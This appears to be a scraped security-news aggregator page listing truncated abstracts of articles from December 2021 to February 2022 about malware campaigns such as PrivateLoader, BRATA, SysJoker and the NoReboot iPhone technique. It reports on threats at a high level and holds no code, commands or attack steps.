A detailed examination of a Pay-per-install (PPI) malware service called PrivateLoader has revealed its crucial role in the delivery of a variety of malware such as SmokeLoader , RedLine Stealer , Vidar , Raccoon , and GCleaner since at least May 2021. Loaders are malicious programs used for loading additional executables onto the infected machine. With PPI malware services such as PrivateLoader, malware operators pay the service owners to get their payloads "installed" based on the targets provided. "The accessibility and moderate costs allow malware operators to leverage these services as another weapon for rapid, bulk and geo-targeted malware infections," cybersecurity firm Intel 471 said in a new report shared with The Hacker News. PrivateLoader, written in the C++ programming language, is designed to retrieve URLs for the malicious payloads to be deployed on the infected host, with the distribution primarily relying on a network of bait websitesThe Hacker News
February 08, 2022
‘Roaming Mantis’ Android Malware Targeting Europeans via Smishing Campaigns Full Text
Abstract
A financially motivated campaign that targets Android devices and spreads mobile malware via SMS phishing techniques since at least 2018 has spread its tentacles to strike victims located in France and Germany for the first time. Dubbed Roaming Mantis , the latest spate of activities observed in 2021 involve sending fake shipping-related texts containing a URL to a landing page from where Android users are infected with a banking trojan known as Wroba whereas iPhone users are redirected to a phishing page that masquerades as the official Apple website. The top affected countries, based on telemetry data gathered by Kaspersky between July 2021 and January 2022, are France, Japan, India, China, Germany, and Korea. Also tracked under the names MoqHao and XLoader (not to be confused with the info-stealer malware of the same name targeting Windows and macOS ), the group's activity has continued to expand geographically even as the operators broadened their attack methods to mThe Hacker News
February 08, 2022
Medusa Android Banking Trojan Spreading Through Flubot’s Attacks Network Full Text
Abstract
Two different Android banking Trojans, FluBot and Medusa, are relying on the same delivery vehicle as part of a simultaneous attack campaign, according to new research published by ThreatFabric. The ongoing side-by-side infections, facilitated through the same smishing (SMS phishing) infrastructure, involved the overlapping usage of "app names, package names, and similar icons," the Dutch mobile security firm said. Medusa, first discovered targeting Turkish financial organizations in July 2020, has undergone several iterations, chief among which is the ability to abuse accessibility permissions in Android to siphon funds from banking apps to an account controlled by the attacker. "Medusa sports other dangerous features like keylogging, accessibility event logging, and audio and video streaming — all these capabilities provide actors with almost full access to [a] victim's device," the researchers said . The malware-ridden apps used in conjunction with FluThe Hacker News
February 8, 2022
The Growing Menace of Malicious npm Packages Full Text
Abstract
Researchers found 1,300 malicious npm packages that could help hackers trigger supply chain attacks and steal credentials and cryptocurrency, as well as run botnets. The report states that 57% of attacks happened during three days of the week - Friday, Saturday, and Sunday. It is recommended to ... Read MoreCyware Alerts - Hacker News
February 8, 2022
PrivateLoader Used to Deploy Smokeloader, Redline, and Vidar Malware Full Text
Abstract
An examination of a pay-per-install loader called PrivateLoader has highlighted its place in the deployment of popular malware strains including Smokeloader, Redline, and Vidar.ZDNet
February 08, 2022
Qbot needs only 30 minutes to steal your credentials, emails Full Text
Abstract
The widespread malware known as Qbot (aka Qakbot or QuakBot) has recently returned to light-speed attacks, and according to analysts, it only takes around 30 minutes to steal sensitive data after the initial infection.BleepingComputer
February 7, 2022
Roaming Mantis Expands Android Backdoor to Europe Full Text
Abstract
The ‘smishing’ group lives up to its name, expanding globally and adding image exfiltration to the Wroba RAT it uses to infect mobile victims.Threatpost
February 07, 2022
New CapraRAT Android Malware Targets Indian Government and Military Personnel Full Text
Abstract
A politically motivated advanced persistent threat (APT) group has expanded its malware arsenal to include a new remote access trojan (RAT) in its espionage attacks aimed at Indian military and diplomatic entities. Called CapraRAT by Trend Micro, the implant is an Android RAT that exhibits a high "degree of crossover" with another Windows malware known as CrimsonRAT that's associated with Earth Karkaddan, a threat actor that's also tracked under the monikers APT36, Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe. The first concrete signs of APT36's existence appeared in 2016 as the group began distributing information-stealing malware through phishing emails with malicious PDF attachments targeting Indian military and government personnel. The group is believed to be of Pakistani origin and operational since at least 2013. The threat actor is also known to be consistent in its modus operandi, with the attacks predominantly banking oThe Hacker News
February 07, 2022
Microsoft plans to kill malware delivery via Office macros Full Text
Abstract
Microsoft announced today that it will make it difficult to enable VBA macros downloaded from the Internet in several Microsoft Office apps starting in early April, effectively killing a popular distribution method for malware.BleepingComputer
February 3, 2022
MacOS Malware UpdateAgent Grows Increasingly Malicious Full Text
Abstract
The macOS malware, dubbed UpdateAgent, was found propagating for almost 14 months. It started circulating around November or December 2020 as a basic infostealer.Cyware Alerts - Hacker News
February 03, 2022
New Variant of UpdateAgent Malware Infects Mac Computers with Adware Full Text
Abstract
Microsoft on Wednesday shed light on a previously undocumented Mac trojan that it said has undergone several iterations since its first appearance in September 2020, effectively granting it an "increasing progression of sophisticated capabilities." The company's Microsoft 365 Defender Threat Intelligence Team dubbed the new malware family " UpdateAgent ," charting its evolution from a barebones information stealer to a second-stage payload distributor as part of multiple attack waves observed in 2021. "The latest campaign saw the malware installing the evasive and persistent Adload adware, but UpdateAgent's ability to gain access to a device can theoretically be further leveraged to fetch other, potentially more dangerous payloads," the researchers said . The actively in-development malware is said to be propagated via drive-by downloads or advertisement pop-ups that masquerade as legitimate software like video applications and support agentsThe Hacker News
February 03, 2022
State hackers’ new malware helped them stay undetected for 250 days Full Text
Abstract
A state-backed Chinese APT actor tracked as 'Antlion' has been using a new custom backdoor called 'xPack' against financial organizations and manufacturing companies.BleepingComputer
February 2, 2022
Thousands of Malicious npm Packages Threaten Web Apps Full Text
Abstract
Attackers increasingly are using malicious JavaScript packages to steal data, engage in cryptojacking and unleash botnets, offering a wide supply-chain attack surface for threat actors.Threatpost
February 2, 2022
Charming Kitten Sharpens Its Claws with PowerShell Backdoor Full Text
Abstract
The notorious Iranian APT is fortifying its arsenal with new malicious tools and evasion tactics and may even be behind the Memento ransomware.Threatpost
February 2, 2022
Lazarus Pushes Malware by Placing Job Offers Full Text
Abstract
Lazarus APT group, infamous for targeting the defense industry, now abuses Windows Update Client to spread malware. It was recently observed masquerading as Lockheed Martin in spear-phishing campaigns. For the first time in this campaign, the group had used GitHub as a C2 for targeted and short-ter ... Read MoreCyware Alerts - Hacker News
February 2, 2022
CoinStomp Malware Targets Asian Cloud Service Providers to Mine Monero Full Text
Abstract
Researchers say that the purpose of CoinStomp is to quietly compromise instances in order to harness computing power to illicit mine for cryptocurrency, a form of attack known as cryptojacking.ZDNet
February 02, 2022
SEO poisoning pushes malware-laced Zoom, TeamViewer, Visual Studio installers Full Text
Abstract
A new SEO poisoning campaign is underway, dropping the Batloader and Atera Agent malware onto the systems of targeted professionals searching for productivity tool downloads, such as Zoom, TeamViewer, and Visual Studio.BleepingComputer
February 02, 2022
New Malware Used by SolarWinds Attackers Went Undetected for Years Full Text
Abstract
The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once indicative of the elusive nature of the campaigns and the adversary's ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light. Nobelium, the Microsoft-assigned moniker for the SolarWinds intrusion in December 2020, is also tracked by the wider cybersecurity community under the names UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks). The malicious activities have since been attributed to a Russian state-sponsoreThe Hacker News
February 01, 2022
Malicious CSV text files used to install BazarBackdoor malware Full Text
Abstract
A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware.BleepingComputer
February 01, 2022
Powerful new Oski variant ‘Mars Stealer’ grabbing 2FAs and crypto Full Text
Abstract
A new and powerful malware named 'Mars Stealer' has appeared in the wild, and appears to be a redesign of the Oski malware that shut down development abruptly in the summer of 2020.BleepingComputer
February 01, 2022
SolarMarker Malware Uses Novel Techniques to Persist on Hacked Systems Full Text
Abstract
In a sign that threat actors continuously shift tactics and update their defensive measures, the operators of the SolarMarker information stealer and backdoor have been found leveraging stealthy Windows Registry tricks to establish long-term persistence on compromised systems. Cybersecurity firm Sophos, which spotted the new behavior, said that the remote access implants are still being detected on targeted networks despite the campaign witnessing a decline in November 2021. Boasting of information harvesting and backdoor capabilities, the .NET-based malware has been linked to at least three different attack waves in 2021. The first set, reported in April , took advantage of search engine poisoning techniques to trick business professionals into visiting sketchy Google sites that installed SolarMarker on the victim's machines. Then in August, the malware was observed targeting healthcare and education sectors with the goal of gathering credentials and sensitive information.The Hacker News
January 31, 2022
Cobalt Strike and Prometheus Traffic Direction System - New Tools of the Cyber Threat Trade Full Text
Abstract
BlackBerry researchers have discovered the relationship between the Prometheus Traffic Direction System and a leaked Cobalt Strike SSL key pair, as well as with various malware families. In the last two years, multiple threat actors and ransomware groups such as FIN7, FickerStealer, Qakbot, DarkCry ... Read MoreCyware Alerts - Hacker News
January 28, 2022
Shlayer and Bundlore MacOS Malware Strains – How Uptycs EDR Detection Can Help Full Text
Abstract
MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks have not changed – attacking older macOS versions and poorly-protected websites.Threatpost
January 27, 2022
Chaes Banking Trojan Hijacks Chrome Browser with Malicious Extensions Full Text
Abstract
A financially-motivated malware campaign has compromised over 800 WordPress websites to deliver a banking trojan dubbed Chaes targeting Brazilian customers of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago. First documented by Cybereason in November 2020, the info-stealing malware is delivered via a sophisticated infection chain that's engineered to harvest sensitive consumer information, including login credentials, credit card numbers, and other financial information. "Chaes is characterized by the multiple-stage delivery that utilizes scripting frameworks such as JScript, Python, and NodeJS, binaries written in Delphi, and malicious Google Chrome extensions," Avast researchers Anh Ho and Igor Morgenstern said . "The ultimate goal of Chaes is to steal credentials stored in Chrome and intercept logins of popular banking websites in Brazil." The attack sequence is triggered when users visit one of the infected websitesThe Hacker News
January 27, 2022
A new highly evasive technique used to deliver the AsyncRAT Malware Full Text
Abstract
Experts spotted a sophisticated malware campaign delivering the AsyncRAT trojan since September 2021. Researchers from Morphisec spotted a sophisticated phishing campaign delivering the AsyncRAT trojan since September 2021. The phishing messages...Security Affairs
January 26, 2022
‘Dark Herring’ Billing Malware Swims onto 105M Android Devices Full Text
Abstract
The mobile malware heisted hundreds of millions of dollars from unsuspecting users, thanks to 470 different well-crafted malicious app in Google Play.Threatpost
January 26, 2022
Chaes banking trojan hijacks Chrome with malicious extensions Full Text
Abstract
A large-scale campaign involving over 800 compromised WordPress websites is spreading banking trojans that target the credentials of Brazilian e-banking users.BleepingComputer
January 26, 2022
BHUNT - New Password Stealer Aiming for Crypto Wallets Full Text
Abstract
BHUNT is a new crypto stealer family and was spotted by Bitdefender. It is written in .NET and is capable of pilfering wallet content from Electrum, Bitcoin, Ethereum, Exodus, and Atomic, among others.Cyware Alerts - Hacker News
January 25, 2022
MoonBounce: Third UEFI Bootkit in Town Full Text
Abstract
Kaspersky unearthed MoonBounce, a custom UEFI firmware implant, that can hide in the system across disk formatting or replacement. It appears to be the brainwork of the Chinese Winnti group. The infection chain does not leave any evidence and works entirely in memory. Researchers advise enabling Se ... Read MoreCyware Alerts - Hacker News
January 25, 2022
TrickBot Malware Using New Techniques to Evade Web Injection Attacks Full Text
Abstract
The cybercrime operators behind the notorious TrickBot malware have once again upped the ante by fine-tuning its techniques by adding multiple layers of defense to slip past antimalware products. "As part of that escalation, malware injections have been fitted with added protection to keep researchers out and get through security controls," IBM Trusteer said in a report. "In most cases, these extra protections have been applied to injections used in the process of online banking fraud — TrickBot's main activity since its inception after the Dyre Trojan 's demise." TrickBot , which started out as a banking trojan, has evolved into a multi-purpose crimeware-as-a-service (CaaS) that's employed by a variety of actors to deliver additional payloads such as ransomware. Over 100 variations of TrickBot have been identified to date, one of which is a " Trickboot " module that can modify the UEFI firmware of a compromised device. In the fall of 2The Hacker News
January 25, 2022
Latest version of Android RAT BRATA wipes devices after stealing data Full Text
Abstract
A new version of the BRATA malware implements a functionality to perform a factory reset of the device to wipe all data. The new version of the BRATA Android malware supports new features, including GPS tracking and a functionality to perform a factory...Security Affairs
January 25, 2022
New DazzleSpy malware targets macOS users in watering hole attack Full Text
Abstract
A new watering hole attack has been discovered targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong and infecting them with the DazzleSpy malwareBleepingComputer
January 24, 2022
Mobile Banking Trojan BRATA Gains New, Dangerous Capabilities Full Text
Abstract
The Android malware tracked as BRATA has been updated with new features that grants it the ability to track device locations and even perform a factory reset in an apparent bid to cover up fraudulent wire transfers. The latest variants, detected late last year, are said to be distributed through a downloader to avoid being detected by security software, Italian cybersecurity firm Cleafy said in a technical write-up . Targets include banks and financial institutions in the U.K., Poland, Italy, and Latin America. "What makes Android RAT so interesting for attackers is its capability to operate directly on the victim devices instead of using a new device," Cleafy researchers noted in December 2021. "By doing so, Threat Actors (TAs) can drastically reduce the possibility of being flagged "as suspicious", since the device's fingerprinting is already known to the bank." First seen in the wild at the end of 2018 and short for "Brazilian Remote AcThe Hacker News
January 24, 2022
Hackers Using New Malware Packer DTPacker to Avoid Analysis, Detection Full Text
Abstract
A previously undocumented malware packer named DTPacker has been observed distributing multiple remote access trojans (RATs) and information stealers such as Agent Tesla, Ave Maria, AsyncRAT, and FormBook to plunder information and facilitate follow-on attacks. "The malware uses multiple obfuscation techniques to evade antivirus, sandboxing, and analysis," enterprise security company Proofpoint said in an analysis published Monday. "It is likely distributed on underground forums." The .NET-based commodity malware has been associated with dozens of campaigns and multiple threat groups, both advanced persistent threat (APT) and cybercrime actors, since 2020, with the intrusions aimed at hundreds of customers across many sectors. Attack chains involving the packer rely on phishing emails as an initial infection vector. The messages contain a malicious document or a compressed executable attachment, which, when opened, deploys the packer to launch the malware.The Hacker News
January 24, 2022
Researchers break down WhisperGate wiper malware used in Ukraine website defacement Full Text
Abstract
The malware used to strike Ukrainian government websites has similarities to the NotPetya wiper but has more capabilities "designed to inflict additional damage," researchers say.ZDNet
January 24, 2022
Android malware BRATA wipes your device after stealing data Full Text
Abstract
The Android malware known as BRATA has added new and dangerous features to its latest version, including GPS tracking, the capacity to use multiple communication channels, and a function that performs a factory reset on the device to wipe all traces of malicious activity.BleepingComputer
January 24, 2022
Malicious PowerPoint files used to push remote access trojans Full Text
Abstract
Since December 2021, a growing trend in phishing campaigns has emerged that uses malicious PowerPoint documents to distribute various types of malware, including remote access and information-stealing trojans.BleepingComputer
January 21, 2022
Spyware Blitzes Compromise, Cannibalize ICS Networks Full Text
Abstract
The brief spearphishing campaigns spread malware and use compromised networks to steal credentials that can be sold or used to commit financial fraud.Threatpost
January 21, 2022
Diavol Ransomware has Connections with TrickBot Full Text
Abstract
The FBI first learned of Diavol ransomware in October 2021. The FBI has not yet observed Diavol leak victim data, despite ransom notes including threats to leak stolen information.Heimdal Security
January 21, 2022
Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware Full Text
Abstract
New Emotet spam campaigns were found using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines try to trick users into enabling macros.Trend Micro
January 19, 2022
New BHUNT Password Stealer Malware Targeting Cryptocurrency Wallets Full Text
Abstract
A new evasive crypto wallet stealer named BHUNT has been spotted in the wild with the goal of financial gain, adding to a list of digital currency stealing malware such as CryptBot, Redline Stealer , and WeSteal . "BHUNT is a modular stealer written in .NET, capable of exfiltrating wallet (Exodus, Electrum, Atomic, Jaxx, Ethereum, Bitcoin, Litecoin wallets) contents, passwords stored in the browser, and passphrases captured from the clipboard," Bitdefender researcher said in a technical report on Wednesday. The campaign, distributed globally across Australia, Egypt, Germany, India, Indonesia, Japan, Malaysia, Norway, Singapore, South Africa, Spain, and the U.S., is suspected to be delivered to compromised systems via cracked software installers. The modus operandi of using cracks as an infection source for initial access mirrors similar cybercrime campaigns that have leveraged tools such as KMSPico as a conduit for deploying malware. "Most infected users alsoThe Hacker News
January 19, 2022
Destructive Wiper Targeting Ukraine Aimed at Eroding Trust, Experts Say Full Text
Abstract
Disruptive malware attacks on Ukrainian organizations (posing as ransomware attacks) are very likely part of Russia’s wider effort to undermine Ukraine’s sovereignty, according to analysts.Threatpost
January 19, 2022
New BHUNT malware targets your crypto wallets and passwords Full Text
Abstract
A novel modular crypto-wallet stealing malware dubbed 'BHUNT' has been spotted targeting cryptocurrency wallet contents, passwords, and security phrases.BleepingComputer
January 18, 2022
New FluBot Malware Variant Imitates Flash Player to Trick Users Full Text
Abstract
Researchers at F5 Networks observed a new smishing campaign by the FluBot malware operators, camouflaged as Flash Player, to target Android users. The FluBot version 5.2 comes with important improvements including the implementation of a new command to change the domain generation algorithms seed r ... Read MoreCyware Alerts - Hacker News
January 17, 2022
Linux malware is on the rise. Here are three top threats right now Full Text
Abstract
Linux-based systems are everywhere and are a core part of the internet infrastructure but it's low-powered IoT devices that have become the main target for Linux malware.ZDNet
January 16, 2022
A New Destructive Malware Targeting Ukrainian Government and Business Entities Full Text
Abstract
Cybersecurity teams from Microsoft on Saturday disclosed they identified evidence of a new destructive malware operation targeting government, non-profit, and information technology entities in Ukraine amid brewing geopolitical tensions between the country and Russia. "The malware is disguised as ransomware but, if activated by the attacker, would render the infected computer system inoperable," Tom Burt, corporate vice president of customer security and trust at Microsoft, said , adding the intrusions were aimed at government agencies that provide critical executive branch or emergency response functions. Also targeted is an IT firm that "manages websites for public and private sector clients, including government agencies whose websites were recently defaced ," Burt noted. The computing giant, which first detected the malware on January 13, attributed the attacks to an emerging threat cluster codenamed " DEV-0586 ," with no observed overlaps in tactThe Hacker News
January 13, 2022
SysJoker, a previously undetected cross-platform backdoor made the headlines Full Text
Abstract
Security researchers found a new cross-platform backdoor, dubbed SysJoker, the is suspected to be the work of an APT group. Security experts from Intezer discovered a new backdoor, dubbed SysJoker, that is able to infect Windows, macOS, and Linux...Security Affairs
January 12, 2022
New SysJoker Espionage Malware Targeting Windows, macOS, and Linux Users Full Text
Abstract
A new cross-platform backdoor called " SysJoker " has been observed targeting machines running Windows, Linux, and macOS operating systems as part of an ongoing espionage campaign that's believed to have been initiated during the second half of 2021. "SysJoker masquerades as a system update and generates its [command-and-control server] by decoding a string retrieved from a text file hosted on Google Drive," Intezer researchers Avigayil Mechtinger, Ryan Robinson, and Nicole Fishbein noted in a technical write-up publicizing their findings. "Based on victimology and malware's behavior, we assess that SysJoker is after specific targets." The Israeli cybersecurity company, attributing the work to an advanced threat actor, said it first discovered evidence of the implant in December 2021 during an active attack against a Linux-based web server belonging to an unnamed educational institution. A C++-based malware, SysJoker is delivered via a drThe Hacker News
January 12, 2022
New RedLine malware version distributed as fake Omicron stat counter Full Text
Abstract
Experts warn of a new variant of the RedLine malware that is distributed via emails as fake COVID-19 Omicron stat counter app as a lure. Fortinet researchers have spotted a new version of the RedLine info-stealer that is spreading via emails using...Security Affairs
January 12, 2022
Cloud Apps Replace Web as Source for Most Malware Downloads Full Text
Abstract
Two-thirds of all malware distributed to enterprise networks last year originated from cloud apps such as Google Drive, OneDrive, and numerous other cloud apps, new research shows.Dark Reading
January 11, 2022
‘Fully Undetected’ SysJoker Backdoor Malware Targets Windows, Linux & macOS Full Text
Abstract
The malware establishes initial access on targeted machines, then waits for additional code to execute.Threatpost
January 11, 2022
New RedLine malware version spread as fake Omicron stat counter Full Text
Abstract
A new variant of the RedLine info-stealer is distributed via emails using a fake COVID-19 Omicron stat counter app as a lure.BleepingComputer
January 11, 2022
New SysJoker backdoor targets Windows, macOS, and Linux Full Text
Abstract
A new multi-platform backdoor malware named 'SysJoker' has emerged in the wild, targeting Windows, Linux, and macOS with the ability to evade detection on all three operating systems.BleepingComputer
January 9, 2022
New Ways to Hide Malware Inside SSD Firmware Discovered Full Text
Abstract
The attacks target drives with flex capacity features and hidden areas on the device called over-provisioning areas used by SSD makers for performance optimization on storage systems based on NAND flash.Cyware Alerts - Hacker News
January 08, 2022
Trojanized dnSpy app drops malware cocktail on researchers, devs Full Text
Abstract
Hackers targeted cybersecurity researchers and developers this week in a sophisticated malware campaign distributing a malicious version of the dnSpy .NET application to install cryptocurrency stealers, remote access trojans, and miners.BleepingComputer
January 8, 2022
FluBot malware continues to evolve. What’s new in Version 5.0 and beyond? Full Text
Abstract
Researchers warn of new campaigns distributing a new improved version of the FluBot malware posing as Flash Player. Researchers from F5 security are warning of a new enhanced version of the FluBot Android malware that that spread posed as Flash Player....Security Affairs
January 07, 2022
FluBot malware now targets Europe posing as Flash Player app Full Text
Abstract
The widely distributed FluBot malware continues to evolve, with new campaigns distributing the malware as Flash Player and the developers adding new features.BleepingComputer
January 6, 2022
Apple iPhone Malware Tactic Causes Fake Shutdowns to Enable Spying Full Text
Abstract
The ‘NoReboot’ technique is the ultimate in persistence for iPhone malware, preventing reboots and enabling remote attackers to do anything on the device while remaining completely unseen.Threatpost
January 06, 2022
New Trick Could Let Malware Fake iPhone Shutdown to Spy on Users Secretly Full Text
Abstract
Researchers have disclosed a novel technique by which malware on iOS can achieve persistence on an infected device by faking its shutdown process, making it impossible to physically determine if an iPhone is off or otherwise. The discovery — dubbed " NoReboot " — comes courtesy of mobile security firm ZecOps, which found that it's possible to block and then simulate an iOS rebooting operation, deceiving the user into believing that the phone has been powered off when, in reality, it's still running. The San Francisco-headquartered company called it the "ultimate persistence bug […] that cannot be patched because it's not exploiting any persistence bugs at all — only playing tricks with the human mind." NoReboot works by interfering with the routines used in iOS to shutdown and restart the device, effectively preventing them from ever happening in the first place and allowing a trojan to achieve persistence without persistence as the device is neverThe Hacker News
January 6, 2022
NoReboot persistence technique fakes iPhone shutdown Full Text
Abstract
Researchers devised a sophisticated persistence technique, named NoReboot, for iOS malware that fake shut downs. Researchers from Zecops devised a sophisticated persistence technique, named NoReboot, for iOS malware that fake shut downs while spies...Security Affairs
January 05, 2022
New Zloader Banking Malware Campaign Exploiting Microsoft Signature Verification Full Text
Abstract
An ongoing ZLoader malware campaign has been uncovered exploiting remote monitoring tools and a nine-year-old flaw concerning Microsoft's digital signature verification to siphon user credentials and sensitive information. Israeli cybersecurity company Check Point Research, which has been tracking the sophisticated infection chain since November 2021, attributed it to a cybercriminal group dubbed Malsmoke , citing similarities with previous attacks. "The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine," Check Point's Golan Cohen said in a report shared with The Hacker News. "The malware then exploits Microsoft's digital signature verification method to inject its payload into a signed system DLL to further evade the system's defenses." The campaign is said to have claimed 2,170 victims across 111 countries as of January 2, 2022, with moThe Hacker News
January 5, 2022
‘Malsmoke’ Exploits Microsoft’s E-Signature Verification Full Text
Abstract
The info-stealing campaign using ZLoader malware – previously used to deliver Ryuk and Conti ransomware – already has claimed more than 2,000 victims across 111 countries.Threatpost
January 05, 2022
iOS malware can fake iPhone shut downs to snoop on camera, microphone Full Text
Abstract
Researchers have developed a new technique that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and receive sensitive data via a live network connection.BleepingComputer
January 4, 2022
Remote Access Malware Rises, Ransomware Operators Rebrand, and More Attacks on Individuals: Report Full Text
Abstract
According to a Positive Technologies report, the number of attacks in Q3 2021 decreased by 4.8% as compared to Q2 2021. This was mainly caused by some major ransomware players leaving the market.Cyware Alerts - Hacker News
January 4, 2022
Purple Fox backdoor spreads through fake Telegram App installer Full Text
Abstract
Threat actors are spreading the Purple Fox backdoor using tainted installers of the Telegram messaging application. Threat actors are using weaponized installers of the Telegram messaging application to deliver the Purple Fox backdoor on Windows systems. Researchers...Security Affairs
January 03, 2022
Purple Fox malware distributed via malicious Telegram installers Full Text
Abstract
A laced Telegram for desktop installer was spotted distributing the Purple Fox malware while disabling the UAC on the infected systems.BleepingComputer
January 3, 2022
RedLine Malware Pilfer Passwords Saved in Multiple Browsers Full Text
Abstract
RedLine information stealer was found targeting popular web browsers such as Edge, Opera, Whale, and Chrome and extracting passwords saved in these. The stealer is a commodity malware that can be purchased at an affordable price of just $200 on cybercrime forums. U sers are recommended to use a th ... Read MoreCyware Alerts - Hacker News
December 31, 2021
How to implant a malware in hidden area of SSDs with Flex Capacity feature Full Text
Abstract
Researchers devised a series of attacks against SSDs that could allow to implant malware in a location that is not monitored by security solutions. Korean researchers devised a series of attacks against solid-state drives (SSDs) that could allow to implant...Security Affairs
December 30, 2021
New iLOBleed Rootkit Targeting HP Enterprise Servers with Data Wiping Attacks Full Text
Abstract
A previously unknown rootkit has been found setting its sights on Hewlett-Packard Enterprise's Integrated Lights-Out ( iLO ) server management technology to carry out in-the-wild attacks that tamper with the firmware modules and completely wipe data off the infected systems. The discovery, which is the first instance of real-world malware in iLO firmware, was documented by Iranian cybersecurity firm Amnpardaz this week. "There are numerous aspects of iLO that make it an ideal utopia for malware and APT groups: Extremely high privileges (above any level of access in the operating system), very low-level access to the hardware, being totally out of the sight of the admins, and security tools, the general lack of knowledge and tools for inspecting iLO and/or protecting it, the persistence it provides for the malware to remain even after changing the operating system, and in particular being always running and never shutting down," the researchers said . Besides managinThe Hacker News
December 30, 2021
New iLOBleed Rootkit, the first time ever that malware targets iLO firmware Full Text
Abstract
A previously unknown rootkit, dubbed iLOBleed, was used in attacks aimed at HP Enterprise servers that wiped data off the infected systems. iLOBleed, is a previously undetected rootkit that was spotted targeting the HP Enterprise's Integrated Lights-Out...Security Affairs
December 28, 2021
New Flagpro malware linked to Chinese state-backed hackers Full Text
Abstract
The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms.BleepingComputer
December 28, 2021
Threat actors are abusing MSBuild to implant Cobalt Strike Beacons Full Text
Abstract
Experts warn of malicious campaigns abusing Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised systems. Security expert from Morphus Labs recently observed several malicious campaigns abusing Microsoft Build Engine...Security Affairs
December 28, 2021
RedLine malware shows why passwords shouldn’t be saved in browsers Full Text
Abstract
The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.BleepingComputer
December 28, 2021
Riskware Android streaming apps found on Samsung’s Galaxy store Full Text
Abstract
Samsung's official Android app store, called the Galaxy Store, has had an infiltration of riskware apps that triggered multiple Play Protect warnings on people's devices.BleepingComputer
December 27, 2021
Echelon Infostealer Drops in via Telegram Full Text
Abstract
A Telegram handle was found distributing malicious Echelon infostealer targeted at users of a cryptocurrency discussion channel on the messaging platform. Echelon aims to steal login credentials from popular file-sharing platforms and messaging applications including FileZilla, Discord, Outlook, E ... Read MoreCyware Alerts - Hacker News
December 27, 2021
‘Spider-Man: No Way Home’ Pirated Downloads Contain Crypto-Mining Malware Full Text
Abstract
Peter Parker might not be a mastermind cryptocurrency criminal, but the name Spiderman is quickly becoming more associated with the mining landscape. ReasonLabs , a leading provider of cybersecurity prevention and detection software, recently discovered a new form of malware hacking into customer computers in the guise of the latest Spiderman movie. As perhaps the most talked-about movie for some time , Spiderman: No Way Home represents an excellent opportunity for hackers. It's a chance to connect with millions of potential targets, and hack into computers all around the globe. All today's malicious actors need to do is promise their victims access to the latest movie, and they get an all-access pass to their PC. The cryptocurrency mining malware discovered by ReasonLabs disguises itself as a torrent for the Spiderman: No Way Home movie, encouraging viewers around the world to download the file, and open the computer to criminals. Using a Mask: Tricking Users into DowThe Hacker News
December 27, 2021
New Android Malware Targeting Brazil’s Itaú Unibanco Bank Customers Full Text
Abstract
Researchers have discovered a new Android banking malware that targets Brazil's Itaú Unibanco with the help of lookalike Google Play Store pages to carry out fraudulent financial transactions on victim devices without their knowledge. "This application has a similar icon and name that could trick users into thinking it is a legitimate app related to Itaú Unibanco," Cyble researchers said in a report published last week. "The [threat actor] has created a fake Google Play Store page and hosted the malware that targets Itaú Unibanco on it under the name 'sincronizador.apk .'" The tactic of leveraging fake app store pages as a lure is not new. In March, Meta (previously Facebook) disclosed details of an attack campaign that used its platform as part of a broader operation to spy on Uyghur Muslims using rogue third-party websites that used replica domains for popular news portals and websites designed to resemble third-party Android app stores, where attackers put fake keyboard, prThe Hacker News
December 27, 2021
New Blister Campaign Stealthily Targets Windows Full Text
Abstract
Elastic Security researchers reported a three-month-long malware campaign delivering a stealthy loader, dubbed Blister, on Microsoft Windows. The malware loader further deploys second-stage payloads in memory including Cobalt Strike and BitRAT. Researchers suggest deploying an anti-malware solution ... Read MoreCyware Alerts - Hacker News
December 27, 2021
New Android banking Malware targets Brazil’s Itaú Unibanco Bank Full Text
Abstract
Researchers analyzed a new Android banking malware that targets Brazil's Itaú Unibanco that spreads through fake Google Play Store pages. Researchers from threat intelligence firm Cyble analyzed a new Android banking malware that targets Brazil's...Security Affairs
December 24, 2021
New Rook Ransomware Feeds Off the Code of Babuk Full Text
Abstract
The new Rook ransomware is primarily delivered via a third-party framework, for example Cobalt Strike; however, delivery via phishing email has also been reported in the wild.Sentinel One
December 24, 2021
Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security Full Text
Abstract
Apple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to "trivially and reliably" bypass a "myriad of foundational macOS security mechanisms" and run arbitrary code. Security researcher Patrick Wardle detailed the discovery in a series of tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the issue relates to a scenario where a rogue macOS app may circumvent Gatekeeper checks, which ensure that only trusted apps can be run and that they have passed an automated process called " app notarization ." The iPhone maker, crediting Gordon Long of Box with reporting the flaw, said it addressed the weakness with improved checks as part of macOS 11.6 updates officially released on September 20, 2021. "Such bugs are often particularly impactful to everyday macOS users as they provide a means for adware and malware authors to sidestep macOS security mechanisms, …mThe Hacker News
December 24, 2021
New BLISTER Malware Using Code Signing Certificates to Evade Detection Full Text
Abstract
